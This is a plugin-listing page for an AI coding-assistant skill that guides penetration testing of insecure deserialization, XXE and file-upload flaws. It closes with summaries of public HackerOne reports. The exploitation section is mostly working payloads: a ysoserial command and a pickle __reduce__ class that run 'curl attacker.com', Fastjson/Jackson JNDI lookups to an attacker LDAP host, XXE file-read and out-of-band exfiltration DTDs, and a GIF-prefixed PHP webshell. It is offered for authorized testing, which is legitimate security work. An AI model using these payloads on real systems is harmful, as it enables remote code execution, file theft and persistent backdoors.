Skill

pentest-deserialization-xxe

Guides pentesting for deserialization (Java ysoserial, Python pickle, PHP unserialize, .NET BinaryFormatter, Ruby Marshal), XXE payloads, and file upload bypasses.

Java

Python

npx claudepluginhub yhy0/ghsa-skill-builder --plugin vuln-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

当对 Web 应用进行反序列化和 XXE 渗透测试时加载此 Skill。覆盖 Java/Python/.NET 反序列化、XML 外部实体注入、危险文件上传等。

Supporting Assets

references/cases.md

SKILL.md

Similar Skills

exploiting-insecure-deserialization

Identifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, and .NET apps to achieve RCE during authorized penetration tests. Detects serialized data in traffic like cookies and parameters.

asi

exploiting-insecure-deserialization

5.9k

Identifies serialized data in traffic and exploits deserialization vulns in Java, PHP, Python, .NET apps using ysoserial, PHPGGC for RCE in authorized pentests.

3 files

cybersecurity-skills

exploiting-insecure-deserialization

Identifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, .NET apps for RCE during authorized pentests. Detects serialized payloads in HTTP traffic using ysoserial, PHPGGC, Burp Suite.

3 files

cybersecurity-skills-zh

Stats

Parent Repo Stars50

Parent Repo Forks8

Last CommitMar 14, 2026

Actions

View Source View Plugin View on GitHub View README

Help us improve

Share bugs, ideas, or general feedback.

Deserialization & XXE Penetration Testing Patterns

当对 Web 应用进行反序列化和 XXE 渗透测试时加载此 Skill。覆盖 Java/Python/.NET 反序列化、XML 外部实体注入、危险文件上传等。

Attack Surface Discovery

反序列化入口：

Java：ObjectInputStream、JSON 库（Jackson enableDefaultTyping、Fastjson @type）
Python：pickle.loads()、yaml.load()（不安全的 Loader）
.NET：BinaryFormatter、XmlSerializer、ViewState
PHP：unserialize()、Phar 反序列化
Ruby：Marshal.load()、YAML Psych.load()（Krewe/Rails）

XXE 入口：

XML 文件上传/处理：文档导入、配置文件解析
SOAP/SAML 端点：XML 格式的 Web Service
Office 文档处理：DOCX/XLSX（本质是 ZIP+XML）
SVG 文件上传/渲染
SpellCheck、RSS feed 等 XML 处理功能

危险文件上传：

头像/附件上传缺少类型校验
双扩展名绕过：shell.php.jpg
MIME 类型白名单不严格

Exploitation Techniques

Java 反序列化：

# 使用 ysoserial 生成 payload
java -jar ysoserial.jar CommonsCollections1 "curl attacker.com" > payload.bin

# 常用 Gadget Chain
CommonsCollections1-7  # Apache Commons Collections
Spring1-4              # Spring Framework
Hibernate1             # Hibernate ORM
JRMPClient            # 远程类加载

# 检测：发送序列化魔术字节 (0xACED0005) 到可疑端点

Fastjson/Jackson 反序列化：

// Fastjson @type 注入
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/exploit","autoCommit":true}

// Jackson enableDefaultTyping
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://attacker.com/exploit","autoCommit":true}]

Python 反序列化：

import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com",))
payload = pickle.dumps(Exploit())

XXE 攻击：

<!-- 基础 XXE（文件读取） -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

<!-- Blind XXE（OOB 数据外传） -->
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<!-- evil.dtd: <!ENTITY % exfil SYSTEM "http://attacker.com/?data=%file;"> -->

<!-- SSRF via XXE -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server/admin">
]>

危险文件上传利用：

# 扩展名绕过
shell.php5, shell.phtml, shell.pHp   # PHP 变体
shell.jsp, shell.jspx, shell.jspa    # Java 变体
shell.aspx, shell.ashx, shell.asmx   # .NET 变体

# 内容类型绕过
Content-Type: image/jpeg  # 但文件内容是 PHP webshell

# 双扩展名
shell.php.jpg    # Apache 可能仍解析为 PHP
shell.jpg.php    # 真实扩展名在最后

# Magic bytes + webshell
GIF89a<?php system($_GET['cmd']); ?>   # GIF magic header + PHP

Detection Checklist

Impact Assessment

漏洞利用可达到的效果：

远程代码执行：反序列化 gadget chain → 服务器完全控制
敏感文件读取：XXE 读取 /etc/passwd、配置文件、密钥
SSRF：XXE 访问内部服务、云元数据
Webshell 上传：危险文件上传 → 持久化后门
拒绝服务：XXE Billion Laughs 攻击、反序列化消耗资源

严重度判断：

Critical：反序列化 RCE、XXE 读取云凭证、上传可执行 webshell
High：XXE 读取任意文件、Blind XXE 可外传数据
Medium：XXE 仅可检测但无法外传数据、文件上传类型受限

Real-World Cases

以下案例来自 HackerOne 公开披露的真实漏洞报告，展示了该类漏洞在实际目标中的表现形式。

Case 1: Mars — insecure deserilize object leads to RCE On Sitecore (CVE-██████████-27218)

严重度: Critical | CWE: Deserialization of Untrusted Data
摘要: This critical vulnerability involved an insecure deserialization issue in Sitecore implementation, which was assigned CVE-2025-27218. The vulnerability allowed remote code execution through unsanitize...
报告: https://hackerone.com/reports/3090123

Case 2: Mars — Unrestricted File Upload at ██████████

严重度: Critical | CWE: Unrestricted Upload of File with Dangerous Type
摘要: The endpoint "████████" enabled unrestricted file uploads, allowing anyone to upload any type of file without registration.
报告: https://hackerone.com/reports/2357778

Case 3: Nextcloud — RCE on Wordpress website

严重度: Critical | CWE: Deserialization of Untrusted Data
摘要: A remote code execution vulnerability was exploited on a WordPress website due to unsafe deserialization of user input. This allowed arbitrary code execution as the web server user.
报告: https://hackerone.com/reports/2248328

Case 4: Nintendo — [Xenoblade Chronicles X: Definitive Edition] Unrestricted RPCs allow DoS and writing arbitrary flags remotely

严重度: Critical | CWE: Resource Injection
摘要: The Xenoblade Chronicles X: Definitive Edition vulnerability allowed attackers to perform Denial-of-Service (DoS) attacks and write arbitrary flags remotely due to unrestricted Remote Procedure Calls ...
报告: https://hackerone.com/reports/3062122

Case 5: U.S. Dept Of Defense — DNN - Unrestricted Arbitrary File Upload #████████

严重度: Critical | CWE: File Content Injection
摘要: A vulnerability was discovered in versions of DNN (formerly DotNetNuke) prior to 10.1.1. The vulnerability was caused by the default HTML editor provider allowing unauthenticated file uploads and over...
报告: https://hackerone.com/reports/3414079

Case 6: U.S. Dept Of Defense — [HTAF4-213] [Pre-submission] Unsafe AMF deserialization (CVE-2017-5641) in Apache Flex BlazeDS at the https://www.███████/daip/messagebroker/amf

严重度: Critical | CWE: Deserialization of Untrusted Data
摘要: The vulnerability was an unsafe AMF (Action Message Format) deserialization issue in Apache Flex BlazeDS, affecting the /daip/messagebroker/amf endpoint. Successful exploitation could allow an attac...
报告: https://hackerone.com/reports/728614

Case 7: U.S. Dept Of Defense — [HTA2] XXE on https://███ via SpellCheck Endpoint.

严重度: Critical | CWE: XML External Entities (XXE)
摘要: A full read XXE vulnerability was discovered on a website via the SpellCheck endpoint, allowing an attacker to read local files, make HTTP requests to internal applications and read the responses, ste...
报告: https://hackerone.com/reports/715949

Case 8: Basecamp — Two click Account Takeover

严重度: High | CWE: Deserialization of Untrusted Data
摘要: A vulnerability was discovered in the HEY Email Android application that allowed for a two-click account takeover. Improper handling of incoming deeplinks led to the application's authorization bearer...
报告: https://hackerone.com/reports/3079738

Case 9: Internet Bug Bounty — CVE-2025-24813: Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet

严重度: High | CWE: Deserialization of Untrusted Data
摘要: The Apache Tomcat vulnerability CVE-2025-24813 allowed remote code execution and information disclosure. The vulnerability was caused by a combination of features, including writes enabled for the def...
报告: https://hackerone.com/reports/3031518

Case 10: Internet Bug Bounty — [CVE-2023-27531] Possible Deserialization of Untrusted Data vulnerability in Kredis JSON

严重度: High | CWE: Deserialization of Untrusted Data
摘要: A deserialization vulnerability was discovered in the Kredis JSON deserialization code, allowing for the potential deserialization of untrusted data. This could result in unexpected objects being dese...
报告: https://hackerone.com/reports/2071554